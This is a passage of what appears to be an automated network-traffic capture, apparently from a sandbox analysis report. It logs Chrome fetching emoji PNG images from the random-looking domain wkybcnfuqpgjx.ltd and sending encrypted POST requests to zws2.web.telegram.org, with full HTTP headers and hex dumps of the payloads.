                                  133192.168.2.650086149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:04 UTC450OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 152
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:04 UTC152OUTData Raw: 2a 10 06 78 25 cb 00 4d 0a 27 0d f3 16 cb 00 b7 2e 38 e1 6a 3b 5d c4 aa ab e0 8d 34 1b cf 8c 92 e1 40 bc a6 0b f9 a6 c5 29 50 04 82 a3 ba 53 3c a1 8d ed 2f 57 c5 78 b2 dc f8 96 a7 e1 02 1a 88 f4 09 62 1d e4 d2 e4 8f 51 ea 43 fc 9c ef 24 ae fa 0c 01 09 ee 92 e2 94 61 e1 e2 8f f5 07 66 1a a5 36 7d 13 ed 5c 3e 84 f1 9e a4 57 95 4f d6 8f 46 60 e1 51 91 72 e8 44 61 d5 c0 05 df b1 e7 85 07 4f 08 49 d3 02 b2 80 6d 34 22 d9 8b a1 53 fc d8 9c 75 36 fa 2e 50 77
                                  Data Ascii: *x%M'.8j;]4@)PS</WxbQC$af6}\>WOF`QrDaOIm4"Su6.Pw
                                  2025-01-12 00:04:04 UTC407INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:04 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 88
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:04:04 UTC88INData Raw: 2a 10 06 78 25 cb 00 4d 80 52 b1 fe 16 25 1b 5b 11 23 0c 62 bb 9a 4a 5b 73 5b 58 b7 a4 18 c4 cb b9 61 65 cb 4d 86 e2 88 71 65 11 1e 4f ed 47 4a 93 76 7f 97 e2 84 31 c0 e3 74 a1 38 b5 75 71 d7 f5 04 18 ef 5b 8d 53 ed 3a b6 d8 44 0b 7e 83 e9 9d 98 00 81 03 77 2e 0c
                                  Data Ascii: *x%MR%[#bJ[s[XaeMqeOGJv1t8uq[S:D~w.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  134192.168.2.650093172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:04 UTC370OUTGET /img-apple-160/1f1e6-1f1ff.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:04 UTC897INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:04 GMT
                                  Content-Type: image/png
                                  Content-Length: 4588
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-11ec"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KwLNr5XorGkHeqifi7sSmA8gxnoIbyY1J1gCNAX1EXlKQgobWs%2FWs9AbmDuScPS68L%2BVK81D%2FylxoIKMwA2kQKVQgkOBmgnbIo84QXjMFigpsGTUAkpQNSp5Pj9Npua11oU5BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e3170e8c431f-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1563&rtt_var=604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=1784841&cwnd=250&unsent_bytes=0&cid=53da134005813dbe&ts=161&x=0"
                                  2025-01-12 00:04:04 UTC472INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 05 61 3c 9e 1a 36 84 05 20 17 6b 89 02 55 72 67 9f b3 0b 57 39 16 78 51 62 9b af 0c 59 3a 67 9f b3 0c 58 39 6a a2 b6 0c 58 3a 69 a2 b5 0c 58 39 0c 58 3e 6b a4 b7 61 9a ae 5c 97 ac 07 53 35 62 9a ae 07 53 34 13 5c 41 11 5e 3f 16 67 46 09 56 37 5f 98 ad 04 50 32 5e 98 ad 5e 97 ab 2c 73 8c 2f 75 8e 4c 88 9e 0c 82 54 ed 29 55 c4 04 2e 24 b5 7c 25 b8 7e 25 a1 cd 25 9f cb ff ff ff cc 0b 35 25 b7 7d 25 9e c9 e9 24 4f e0 1b 47 c8 09 33 e6 21 4c c6 07 31 d2 0f 3b 02 7b a6 cf 0e 39 01 7a a4 08 81 ac 04 93 5a 09 83 af c7 04 2f 01 8f 57 e4 1f 4b 1b ad 73 d5 10 3c 19 93 bf 02 91 58 21 b1 78 e2 1d 49 06 95 5c 08 97 5e 0d 88 b4 0d 86 b1 23
                                  Data Ascii: PNGIHDRPLTEGpLa<6 kUrgW9xQbY:gX9jX:iX9X>ka\S5bS4\A^?gFV7_P2^^,s/uLT)U.$|%~%%5%}%$OG3!L1;{9zZ/WKs<X!xI\^#
                                  2025-01-12 00:04:04 UTC1369INData Raw: 64 02 66 3e af 18 3a bf 19 3f ed 1d 4b 2e 8e b1 18 88 b1 15 7e 54 43 91 ae fc 0a 3c 28 87 aa ca 19 41 18 85 ac 9b 02 23 15 71 4c 13 9c 66 e0 00 28 be 05 2e b5 04 2a 46 8b a4 ab 05 29 24 9a c5 37 8a a9 10 8b 5a 17 74 97 56 9d b7 16 7e a5 49 98 b4 fe fc fd 01 4e 2f 17 82 a9 13 6b 48 40 9c be 20 a3 6f 2f 9b c1 26 a9 75 0c ca 83 04 b6 71 1e 9d 6a da 09 37 00 57 75 02 71 98 37 95 b8 06 82 50 00 69 8f 06 6b 42 00 a7 62 fa 20 50 03 61 82 01 90 bc d5 00 29 07 77 4a 2a 93 b9 30 77 97 1c 94 64 1e 8b 5f fc e0 e6 06 9c c8 bd 40 61 0b b1 de 00 53 71 19 be 7f 11 ab d7 f3 69 88 f2 49 6f 09 c2 7c ed 34 5d ef 3d 65 24 96 bf 3f 7c 5c 01 95 c1 f1 59 7b f7 a5 b7 02 af 6a 05 a5 d2 1b a5 d2 3b 83 a0 a9 4b 64 5d 58 84 f8 b0 c0 f5 87 a0 51 73 5a 70 42 69 9c 27 42 7c 73 66 95 5f
                                  Data Ascii: df>:?K.~TC<(A#qLf(.*F)$7ZtV~IN/kH@ o/&uqj7Wuq7PikBb Pa)wJ*0wd_@aSqiIo|4]=e$?|\Y{j;Kd]XQsZpBi'B|sf_
                                  2025-01-12 00:04:04 UTC1369INData Raw: 26 63 38 d0 66 00 be 5b c1 89 1d 62 66 63 99 02 18 3b 2b 20 ef 30 f3 31 20 f7 19 81 bc 7e 08 34 a1 99 01 d7 c0 69 1c 0c 84 cc b4 82 e0 9b e8 30 04 7d 36 f0 71 20 df 23 0c a8 1f 68 a6 36 cc e2 c5 28 9c 04 4c 9a 3d 90 ef 11 d6 61 9b 11 98 cd 81 c0 83 80 8f 01 27 c1 58 a6 03 42 66 03 44 df d4 40 ee 63 40 56 3f 13 9b 05 90 95 70 c6 40 f4 f1 25 68 00 b2 06 07 03 df 4e 18 13 1b 07 f2 b3 64 ce 80 c9 1c c8 b7 48 30 90 fb 38 90 d9 66 0a 84 62 cc 1e 18 3b 19 08 bc 49 40 d0 31 9e 25 70 77 9d 9e 7b 5a aa 21 60 8d 5d 81 97 12 04 26 cd a4 c5 86 3d 3c 0d 10 eb 67 01 c4 8c 8d b5 34 37 36 37 37 d7 65 ff 5c 3b d4 a6 a5 13 f2 a2 ed e5 ab 57 97 2f 9f 8c 85 4f 80 9f b0 b1 33 05 f2 02 4e 06 6e f9 8f c0 96 c6 3b 77 ee 34 36 b6 ec 3a fd 74 e8 d1 e3 d6 fa be 37 94 10 85 a5 ac ac
                                  Data Ascii: &c8f[bfc;+ 01 ~4i0}6q #h6(L=a'XBfD@c@V?p@%hNdH08fb;I@1%pw{Z!`]&=<g47677e\;W/O3Nn;w46:t7
                                  2025-01-12 00:04:04 UTC1369INData Raw: dd ba 1a 7c c1 40 f4 7d a6 67 65 6e ce ad fb f7 4f 75 74 76 15 57 5c 98 6b a0 24 c8 24 e0 f1 3a 9d 2e 7b 49 09 1d 06 db b3 6b 0d 4d 48 5b 84 59 b2 70 e1 54 c0 95 3a 70 15 0a 13 73 f7 a1 f1 44 c7 60 8f 29 b0 b4 74 f6 40 49 b6 6b 4f a0 df b4 3e 7c f2 6c 43 03 94 ad 41 b7 4d 0f 5c cf 80 ab 26 80 9b 8e 1f ff 65 5f e2 b1 b3 1f 9a 01 7b 8e 54 2c 58 30 0b a0 ac 2d 37 09 97 db eb 85 d8 52 4e b3 04 26 9a 00 4f 9d f8 e1 e0 c1 8f 4c 80 ef fd f9 fd 60 cf 85 1a 98 49 fc d1 87 25 50 2d 40 9b 80 cb ed f5 92 a6 60 9b 35 10 0a a8 6d 11 13 e0 87 66 c0 9f be 39 76 f4 6c 6f 4f 91 36 92 f2 f2 a6 01 06 02 14 1a 0a b6 b4 be 7f db b1 7f d0 44 d2 30 8e e3 b1 12 64 10 2d 24 6e c4 76 b7 b1 3d 10 c4 60 d8 81 80 16 69 16 72 85 45 88 b2 9b b9 70 29 54 16 31 2b 68 a1 b7 4d d0 bd 62 3a
                                  Data Ascii: |@}genOutvW\k$$:.{IkMH[YpT:psD`)t@IkO>|lCAM\&e_{T,X0-7RN&OL`I%P-@`5mf9vloO6D0d-$nv=`irEp)T1+hMb:
                                  2025-01-12 00:04:04 UTC9INData Raw: 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: IENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  135192.168.2.650094172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:04 UTC608OUTGET /img-apple-160/1f1e7-1f1ef.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:04 UTC897INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:04 GMT
                                  Content-Type: image/png
                                  Content-Length: 3527
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:41 GMT
                                  ETag: "674840b1-dc7"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X4UL8H5PKAOfSsekflEdMgIsL9yAggDu9kHfjACds1S29WcUH8fZAoAiQLp%2F49gXlAvffwGmMP3l%2FCmE8UQw5fIyEVy1ZJMthKKplEQgxq3nv%2BTm7YME4BVSUiHVxUbp8Xg7fA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e316fa288c2f-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1817&rtt_var=686&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1186&delivery_rate=1588683&cwnd=228&unsent_bytes=0&cid=ae55b6978f0d2f38&ts=634&x=0"
                                  2025-01-12 00:04:04 UTC472INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 73 4b 3d c4 ba 77 97 a4 74 54 2c 29 6a 1a 21 83 9d 74 c2 b2 6a 45 2d 26 cd bd 74 63 96 82 c4 b4 6c 68 9d 88 72 14 1f c2 b1 66 0a 45 2d 5d 93 7f a7 8f 23 a3 6a 28 99 1f 2e 76 16 21 05 44 2c c7 b7 6e 06 41 29 74 15 21 02 4d 30 69 9a 83 09 45 2d c7 b7 6f 74 14 20 66 99 86 07 42 2b 48 81 69 75 16 22 66 99 84 09 44 2c ce be 74 07 43 2b c0 af 64 63 96 82 77 16 22 08 43 2c cd bd 73 65 99 85 76 17 23 0b 47 2f cc bc 73 6d 0e 19 42 68 51 27 41 30 fe ee 34 fd e8 33 fa e1 33 ff d9 30 fc d8 38 fb d7 37 fa d6 38 fa d6 36 fd d5 32 f9 d5 36 f8 d4 36 f9 d4 33 f6 d3 36 f6 d2 34 f4 d2 37 f1 d1 42 f4 d0 30 f2 d0 34 eb ce 4c f1 ce 2f f1 cb 35 ef
                                  Data Ascii: PNGIHDRPLTEGpLsK=wtT,)j!tjE-&tclhrfE-]#j(.v!D,nA)t!M0iE-ot fB+Hiu"fD,tC+dcw"C,sev#G/smBhQ'A0433087862663647B04L/5
                                  2025-01-12 00:04:04 UTC1369INData Raw: 4a e8 33 4a 06 a0 69 ea 31 49 20 92 65 e6 32 49 e8 31 48 56 77 5d f9 28 45 1f 91 64 29 8b 65 f7 28 44 1e 90 63 e3 31 47 06 9b 67 1e 8f 62 e6 2e 46 f4 27 43 ca 42 24 1d 8e 61 e3 2d 44 1b 8d 60 2d 83 61 1b 8c 5f 1e 8a 5f 3c 7a 61 19 8b 5e a0 50 29 d8 2e 44 19 8a 5d e0 2a 41 17 89 5c 17 88 5b e9 1f 4c 17 87 5b dd 27 3e 24 7e 5a 14 86 59 14 85 58 cc 2c 3f 04 89 6c 13 84 57 da 24 3b 18 80 57 12 83 56 11 82 55 d7 21 38 0f 80 54 17 7b 54 0e 7f 52 bf 29 3c ce 21 36 0d 7e 51 d4 1e 35 0c 7d 50 16 77 51 0b 7c 4f c7 21 36 d1 1c 33 0b 7b 4e cc 1d 32 b4 27 38 09 7a 4d d0 1a 31 bd 21 35 d8 12 3b 08 77 4b cc 18 2f 16 6f 4c 06 76 4a 06 75 49 05 74 48 ca 15 2c 1a 68 49 ae 21 32 04 73 47 a9 22 33 a2 25 33 c6 14 2b 03 71 45 cc 0e 31 c6 11 28 b9 17 2b 02 6f 44 03 6c 42 c2 10
                                  Data Ascii: J3Ji1I e2I1HVw](Ed)e(Dc1Ggb.F'CB$a-D`-a__<za^P).D]*A\[L['>$~ZYX,?lW$;WVU!8T{TR)<!6~Q5}PwQ|O!63{N2'8zM1!5;wK/oLvJuItH,hI!2sG"3%3+qE1(+oDlB
                                  2025-01-12 00:04:04 UTC1369INData Raw: ba 25 a2 04 82 b1 10 b4 48 88 42 32 48 8d 4d 44 0d 5a b7 d8 ed 06 38 2c b0 0d 15 76 11 54 80 94 a8 1d 57 d2 4f 16 49 11 a3 c1 c4 12 2b 6e 3d 58 e8 ec 91 2b 0b 8a b6 cf 0c bb c8 2b 61 d6 a1 b0 dc a0 cf 2e b1 6d 4a 2b c4 4e 47 bf 21 3f 4d 00 a8 01 c4 68 44 36 92 ce d9 aa 16 8d 75 54 01 8c 1e 64 83 1f 35 4a 30 36 b9 45 c5 8c cd 18 4b 02 5d 08 44 bf 96 66 f4 db 05 13 7d 58 4c c4 ba 73 2e db 76 b9 75 8f 16 0b 2a ac d7 3b 62 74 e0 37 37 89 5d 18 e1 01 48 66 96 8c 55 e6 2b 6e 0b 3a 56 81 61 74 96 3a b2 15 cf 76 cc 80 7a 14 76 d2 ef 96 52 8a 9d 6b 54 01 ac 57 52 ba 03 14 4d 6d b1 a2 b1 95 44 24 81 f5 2c 96 fe 88 a2 f6 08 ae ef df 82 b1 8d 39 0d bb bb a9 00 e6 57 5c f5 4a 82 da 3c 76 63 31 2a 86 5d cb ad ab 43 fc a6 59 ea fb a7 6a 6c ac 2c 59 8c 29 46 33 d6 89 7d
                                  Data Ascii: %HB2HMDZ8,vTWOI+n=X++a.mJ+NG!?MhD6uTd5J06EK]Df}XLs.vu*;bt77]HfU+n:Vat:vzvRkTWRMmD$,9W\J<vc1*]CYjl,Y)F3}
                                  2025-01-12 00:04:04 UTC317INData Raw: e3 63 70 e3 ec e0 fe 6f 81 60 9d 57 85 3d 72 29 46 4d 18 15 a9 22 a9 a2 49 41 31 e6 11 2c a2 b4 94 8b 5e c4 be fd 03 e1 3e b8 49 db 07 b5 db 89 ce 9e a9 b2 1b 2e b9 bd 83 e9 af e1 ff df 5d 17 7c ed 10 58 28 92 30 96 92 e8 99 d4 96 28 65 59 2c 6e 2c d9 3f de 07 dc 47 de d9 67 25 b6 72 76 72 a6 89 6b 33 3a 38 78 e7 f1 ba e0 c3 7f e2 20 2d 1c 59 4a ce 02 a9 82 a3 fb e8 09 14 e5 f4 04 6a b2 a6 6d c3 57 7f 5e c7 d6 96 74 a6 dc 1c 97 d6 05 19 3d d8 fb 03 d4 8e 2c 25 b1 e8 67 34 02 16 2c 18 ed f9 67 0e e9 cd 5f 06 80 2f 9c c7 36 2f d3 6d 5f a1 3d ba bf f7 27 80 04 89 48 04 05 d2 9c 96 1c a0 9d 1d f6 95 5f be 71 32 6f 4a 7a db 82 80 3c 98 4c 46 bf 86 04 cb 87 48 9b 1c d0 ce d1 37 b4 3a ab 8e 55 ef fe 1a 77 91 fd 7c 32 7a ab fb eb a7 f9 1b 9c 55 5a 55 a5 69 7a a1
                                  Data Ascii: cpo`W=r)FM"IA1,^>I.]|X(0(eY,n,?Gg%rvrk3:8x -YJjmW^t=,%g4,g_/6/m_='H_q2oJz<LFH7:Uw|2zUZUiz


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  136192.168.2.650095149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:04 UTC449OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 88
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:04 UTC88OUTData Raw: 2a 10 06 78 25 cb 00 4d 25 c8 f4 ec ca af 1e b0 a3 64 d6 94 04 c1 6e 2b 65 77 ec 75 27 26 ec 92 1a c0 c4 b8 ea b3 74 75 7a 68 60 97 0b de e0 31 c2 42 79 46 f5 f1 aa 15 b5 eb 18 bb eb 48 09 74 17 d6 79 be 41 75 fd a5 26 b8 77 99 ca c6 53 72 35 f4 1e 58 f6 b5 fe f7
                                  Data Ascii: *x%M%dn+ewu'&tuzh`1ByFHtyAu&wSr5X
                                  2025-01-12 00:04:04 UTC407INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:04 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 88
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:04:04 UTC88INData Raw: 2a 10 06 78 25 cb 00 4d 2d 91 31 5e a9 60 c7 6c 25 6b b1 ea 7f 01 d4 6e 0b 33 dc 76 d0 ca 9a 3a 86 2a c4 2c d8 b8 83 67 2d b7 6c 12 bb 80 7f ed 02 a5 1d fd 1f 5c 5e ed 6a 6a ee e2 97 55 a1 c6 98 fd 29 a4 b5 44 81 2c 5d d4 b4 05 5c 34 4e 06 cc 76 64 7f c7 48 ac 1e
                                  Data Ascii: *x%M-1^`l%kn3v:*,g-l\^jjU)D,]\4NvdH


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  137192.168.2.650096149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:04 UTC350OUTGET /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:04 UTC312INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:04 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:04:04 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  138192.168.2.650102172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:04 UTC608OUTGET /img-apple-160/1f1e7-1f1f2.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:05 UTC894INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:05 GMT
                                  Content-Type: image/png
                                  Content-Length: 6443
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-192b"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J4rCNeOiMtAdDPco8nuyDL2SeymsuO%2BVaFmW524In9e71a4DSBXuGTTY8V8C7uYkPK36U1tks8oavALIEOJQuRKfhbxuajWVh8CxjpSrYgHekpcs5gY3CPCkU0vaQJFwuvnbqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e3196bd64326-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1648&rtt_var=620&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1186&delivery_rate=1771844&cwnd=178&unsent_bytes=0&cid=0b0cef1c573a78bc&ts=613&x=0"
                                  2025-01-12 00:04:05 UTC475INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 8c 17 17 72 03 03 ad 5b 5b 9f 50 50 88 85 a9 00 00 39 64 0a 0a 68 0d 0d ae 67 6c 68 0d 0d 66 0b 0b b2 67 68 65 0a 0a 66 0c 0c 5f 05 05 b8 6a 6a 65 0b 0b 9b 31 33 9d 67 73 b0 5f 60 66 0d 0d 68 0d 0d b2 61 61 b7 6b 6c 80 65 7f b3 78 7c bc 67 67 6e 12 12 be 68 68 73 66 87 66 0b 0b 76 12 12 bf a3 a5 9a 8c 8c 92 00 00 91 00 00 a0 ac a8 7a 4a 58 87 77 83 a8 48 48 95 00 00 a5 1e 1e c6 9d 9d d4 26 26 d1 24 24 d3 25 25 d3 26 26 ff ff ff cb 20 20 bc 10 10 cf 21 21 ce 25 25 f2 18 18 b8 0b 0b fd 26 26 ca 1d 1d b3 08 08 8a 15 15 60 02 02 c6 18 18 9b 16 16 dc 04 04 77 00 00 eb 13 13 ce 23 23 04 01 02 8e 15 15 d5 02 02 e3 0d 0d 1e 1f 75 ed
                                  Data Ascii: PNGIHDRPLTEGpLr[[PP9dhglhfghef_jje13gs_`fhaaklex|ggnhhsffvzJXwHH&&$$%%&& !!%%&&`w##u
                                  2025-01-12 00:04:05 UTC1369INData Raw: 13 b7 bb c7 2f 3e 40 ce 0b 0a 7b 08 0a f7 b2 b1 d8 22 20 8c 05 05 4f 04 04 f8 8a 8a ab ad ae 9a 98 99 4f 34 1f 38 87 2d 3d 96 32 5c a7 c5 2f 2d 23 fc 66 66 54 51 4a a3 15 16 7b 77 74 38 37 71 77 78 a5 8c 94 92 36 62 6c d2 19 19 4a 87 a0 dd f9 fb f0 78 78 9e 90 4d f9 c5 c4 1b 37 22 22 62 1f 77 81 7e 47 48 88 42 a3 36 c2 d5 dc 6f 41 28 24 6e 1c 8e 87 84 fb ec e8 63 5f 32 74 72 39 86 7c 45 78 26 37 fb 3b 3b ff ff f5 1f 51 1b 40 0c 48 f6 e0 de f7 d4 d4 f8 51 51 fb 45 45 c2 ab 54 35 76 30 16 0d 43 52 77 6e 66 b7 d8 b5 43 41 af 1e 1e bd 53 53 a8 50 50 c8 34 35 ac 03 03 c7 44 44 c9 cc ce ba 21 23 af 36 36 b0 29 2a ce e2 e4 ce 58 58 ba 1b 1b d5 4c 4c c2 21 21 af 06 06 93 1c 1c d9 d8 d8 c9 25 25 d7 76 76 a9 01 01 db 8d 8c a2 1d 1d b4 0c 0c b7 0f 0f d5 d5 d6 b5 61
                                  Data Ascii: />@{" OO48-=2\/-#ffTQJ{wt87qwx6blJxxM7""bw~GHB6oA($nc_2tr9|Ex&7;;Q@HQQEET5v0CRwnfCASSPP45DD!#66)*XXLL!!%%vva
